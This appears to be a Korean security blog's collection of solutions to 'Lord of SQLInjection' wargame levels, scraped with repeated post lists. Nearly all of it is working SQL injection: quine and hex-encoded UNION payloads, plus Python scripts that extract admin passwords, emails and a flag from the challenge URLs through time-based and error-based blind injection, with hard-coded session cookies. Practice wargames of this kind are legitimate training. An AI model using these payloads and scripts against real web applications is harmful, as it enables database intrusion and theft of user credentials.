payload
' UNION SELECT REPLACE(REPLACE('" UNION SELECT REPLACE(REPLACE("$",CHAR(34),CHAR(39)),CHAR(36),"$") AS id-- x',CHAR(34),CHAR(39)),CHAR(36),'" UNION SELECT REPLACE(REPLACE("$",CHAR(34),CHAR(39)),CHAR(36),"$") AS id-- x') AS id-- x
| LOS2 alien (0) | 2018.10.10 |
|---|---|
| LOS2 zombie (0) | 2018.10.10 |
| LOS2 phantom (0) | 2018.10.10 |
| LOS2 frankenstein (0) | 2018.10.10 |
| LOS2 blue_dragon (0) | 2018.10.10 |
JeonYoungSin
메모 기록용 공간
import requests
import time
def request(payload):
start = time.time()
url = "http://los.rubiya.kr/phantom_e2e30eaf1c0b3cb61b4b72a932c849fe.php"
params = {'joinmail':payload}
headers = {'Cookie':'PHPSESSID=84u3mb02noqq3j7t40iv2roqc7'}
response = requests.get(url,params=params,headers=headers)
end = time.time()
return end-start
length = 0
for i in range(0,100):
payload = "1'),(if(length((select a.email from prob_phantom a where a.no=1))="+str(i)+",sleep(1),1),'5','1')-- x"
if request(payload) > 1:
length = i
break
print "Find Admin Email Length[*] = " + str(length)
admin_email = ""
for i in range(1,length+1):
binary = ""
for j in range(1,9):
payload = "1'),(if(substring(lpad(bin(ord(substring((select a.email from prob_phantom a where a.no=1),"+str(i)+",1))),8,0),"+str(j)+",1)=1,sleep(1),1),'5','1')-- x"
if request(payload) > 1:
binary += "1"
else:
binary += "0"
if binary != "00000000":
admin_email += chr(int(binary,2))
print "Find Admin Email[*] = " + str(admin_email)
| LOS2 zombie (0) | 2018.10.10 |
|---|---|
| LOS2 ouroboros (0) | 2018.10.10 |
| LOS2 frankenstein (0) | 2018.10.10 |
| LOS2 blue_dragon (0) | 2018.10.10 |
| LOS2 red_dragon (0) | 2018.10.10 |
JeonYoungSin
메모 기록용 공간
import requests
import time
def request(payload):
start = time.time()
url = "http://los.rubiya.kr/frankenstein_b5bab23e64777e1756174ad33f14b5db.php"
params = {'pw':payload}
headers = {'Cookie':'PHPSESSID=84u3mb02noqq3j7t40iv2roqc7'}
response = requests.get(url,params=params,headers=headers)
if "config.php" in response.text:
return True
else:
return False
strings = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
admin_pw = ""
for i in range(1,100):
for j in range(0,len(strings)):
payload = "' or id='admin' and case when pw like '"+admin_pw+strings[j]+"%' then 1 else 9e300*9e300 end-- x "
if request(payload) == True:
admin_pw += strings[j]
break
if j == len(strings)-1:
break
print "Find Admin Pw[*] = " + admin_pw
| LOS2 ouroboros (0) | 2018.10.10 |
|---|---|
| LOS2 phantom (0) | 2018.10.10 |
| LOS2 blue_dragon (0) | 2018.10.10 |
| LOS2 red_dragon (0) | 2018.10.10 |
| LOS2 green_dragon (0) | 2018.10.10 |
JeonYoungSin
메모 기록용 공간
import requests
import time
def request(payload):
start = time.time()
url = "http://los.rubiya.kr/blue_dragon_23f2e3c81dca66e496c7de2d63b82984.php"
params = {'id':payload}
headers = {'Cookie':'PHPSESSID=84u3mb02noqq3j7t40iv2roqc7'}
response = requests.get(url,params=params,headers=headers)
end = time.time()
return end-start
length = 0
for i in range(0,100):
payload = "' or id='admin' and if(length(pw)="+str(i)+",sleep(3),1)-- x"
if request(payload) > 2.8:
length = i
break
print "Find Admin Pw Length[*] = " + str(length)
admin_pw = ""
for i in range(1,length+1):
for j in range(32,127):
payload = "' or id='admin' and if(ascii(substring(pw,"+str(i)+",1))="+str(j)+",sleep(3),1)-- x"
if request(payload) > 2.8:
admin_pw += chr(j)
break
print "Find Admin Pw[*] = " + admin_pw
| LOS2 phantom (0) | 2018.10.10 |
|---|---|
| LOS2 frankenstein (0) | 2018.10.10 |
| LOS2 red_dragon (0) | 2018.10.10 |
| LOS2 green_dragon (0) | 2018.10.10 |
| LOS2 evil_wizard (0) | 2018.10.10 |
JeonYoungSin
메모 기록용 공간
import requests
def request(payload_1,payload_2):
url = "http://los.rubiya.kr/red_dragon_b787de2bfe6bc3454e2391c4e7bb5de8.php"
params = {'id':payload_1,'no':payload_2}
headers = {'Cookie':'PHPSESSID=fnlt2l775q0o8folhtjp84pqg5'}
response = requests.get(url,params=params,headers=headers)
if "Hello admin" in response.text:
return True
else:
return False
payload_1 = "'||pw>#"
payload_2 = "\n0x"
for j in range(0,100):
for i in range(32,128):
if request(payload_1,payload_2+hex(i).replace("0x","")) == False:
payload_2 += hex(i-1).replace("0x","")
break
if i == 127:
break
pw = hex(int(payload_2,16)+1)
print "Find Pw[*] = " + pw[2:len(pw)-1].decode("hex").lower()
| LOS2 frankenstein (0) | 2018.10.10 |
|---|---|
| LOS2 blue_dragon (0) | 2018.10.10 |
| LOS2 green_dragon (0) | 2018.10.10 |
| LOS2 evil_wizard (0) | 2018.10.10 |
| LOS2 hell_fire (0) | 2018.10.10 |
JeonYoungSin
메모 기록용 공간
payload
id=\&pw= union select 0x5c,0x20756e696f6e2073656c6563742030783631363436643639366523#
| LOS2 blue_dragon (0) | 2018.10.10 |
|---|---|
| LOS2 red_dragon (0) | 2018.10.10 |
| LOS2 evil_wizard (0) | 2018.10.10 |
| LOS2 hell_fire (0) | 2018.10.10 |
| LOS All Clear (0) | 2018.02.09 |
JeonYoungSin
메모 기록용 공간
import requests
def request(payload):
url = "http://los.rubiya.kr/evil_wizard_32e3d35835aa4e039348712fb75169ad.php"
params = {'order':payload}
headers = {'Cookie':'PHPSESSID=cjuc8f1iu5f7ooe4ktnrgdv565'}
response = requests.get(url,params=params,headers=headers)
if "h>email</th><th>score</th><tr><td>admin</td" in response.text:
return True
else:
return False
length = 0
for i in range(0,100):
payload = "if(score=50 and length(email)="+str(i)+",score,999)"
if request(payload) == True:
length = i
print "Find Admin Email Length[*] = " + str(length)
admin_email = ""
for i in range(1,length+1):
binary = ""
for j in range(1,9):
payload = "if(score=50 and substring(lpad(bin(ord(substring(email,"+str(i)+",1))),8,0),"+str(j)+",1)=1,score,999)"
if request(payload) == True:
binary += "1"
else:
binary += "0"
if binary != "00000000":
admin_email += chr(int(binary,2))
print "Find Admin Email[*] = " + str(admin_email)
| LOS2 red_dragon (0) | 2018.10.10 |
|---|---|
| LOS2 green_dragon (0) | 2018.10.10 |
| LOS2 hell_fire (0) | 2018.10.10 |
| LOS All Clear (0) | 2018.02.09 |
| LOS umaru (0) | 2018.02.09 |
JeonYoungSin
메모 기록용 공간
import requests
import time
def request(payload):
start = time.time()
url = "http://los.rubiya.kr/hell_fire_309d5f471fbdd4722d221835380bb805.php"
params = {'order':payload}
headers = {'Cookie':'PHPSESSID=cjuc8f1iu5f7ooe4ktnrgdv565'}
response = requests.get(url,params=params,headers=headers)
end = time.time()
return end-start
length = 0
for i in range(0,40):
payload = "if(score=200 and length(email)="+str(i)+",sleep(1),1)"
if request(payload) > 1:
length = i
print "Find Admin Email Length[*] = " + str(length)
admin_email = ""
for i in range(1,length+1):
for j in range(32,127):
payload = "if(score=200 and ascii(substring(email,"+str(i)+",1))="+str(j)+",sleep(1),1)"
if request(payload) > 1:
admin_email += chr(j)
break
print "Find Admin Email[*] = " + str(admin_email)
| LOS2 green_dragon (0) | 2018.10.10 |
|---|---|
| LOS2 evil_wizard (0) | 2018.10.10 |
| LOS All Clear (0) | 2018.02.09 |
| LOS umaru (0) | 2018.02.09 |
| LOS evil_wizard (0) | 2018.02.09 |
JeonYoungSin
메모 기록용 공간
풀이 시작 시간 = 2018-02-08 20:39
풀이 종료 시간 = 2018-02-09 00:12
총 풀이 시간 = 3:33
All Clear
보안 입문하고 일년간 가장 많이한게 웹인데 그래도 다른 분야보다 확실히 이제 슬슬 기본은 갖춰져가고 있는 것 같다. 그리고 워게임 풀 때도 어느정도 시간 생각하면서 푸니 확실히 집중도 더 잘되고 CTF 할 때 도움이 많이 될 것 같다.
| LOS2 evil_wizard (0) | 2018.10.10 |
|---|---|
| LOS2 hell_fire (0) | 2018.10.10 |
| LOS umaru (0) | 2018.02.09 |
| LOS evil_wizard (0) | 2018.02.09 |
| LOS hell_fire (0) | 2018.02.09 |
JeonYoungSin
메모 기록용 공간
import urllib2
import time
def request(data):
start = time.time()
url = "https://los.eagle-jump.org/umaru_6f977f0504e56eeb72967f35eadbfdf5.php?flag="+urllib2.quote(data)
req = urllib2.Request(url)
req.add_header('User-Agent','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko')
req.add_header('Cookie','__cfduid=d8ef4b715b1243db43a171dd9c1503f641517927129; PHPSESSID=iaqbaeq8kf93g61qgl0edanf16')
response = urllib2.urlopen(req).read()
end = time.time() - start
return end
length = 0
admin_pw = ""
strings = "1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!_@"
for i in range(0,50):
payload = "1 and case when length(flag)="+str(i)+" then sleep(10) else 0 end or (select 1 union select 2)"
if request(payload)>9:
length = i
break
print "[*]Admin Password Length = " + str(length)
for j in range(1,length+1):
for i in range(0,len(strings)):
payload = "1 and case when flag like '"+admin_pw+strings[i]+"%' then sleep(10) else 0 end or (select 1 union select 2)"
if request(payload)>9:
admin_pw += strings[i]
print "[-]Admin Password = " + admin_pw
break
print "[*]Admin Password = " + admin_pw
| LOS2 hell_fire (0) | 2018.10.10 |
|---|---|
| LOS All Clear (0) | 2018.02.09 |
| LOS evil_wizard (0) | 2018.02.09 |
| LOS hell_fire (0) | 2018.02.09 |
| LOS dark_eyes (0) | 2018.02.08 |
JeonYoungSin
메모 기록용 공간
메모 기록용 공간
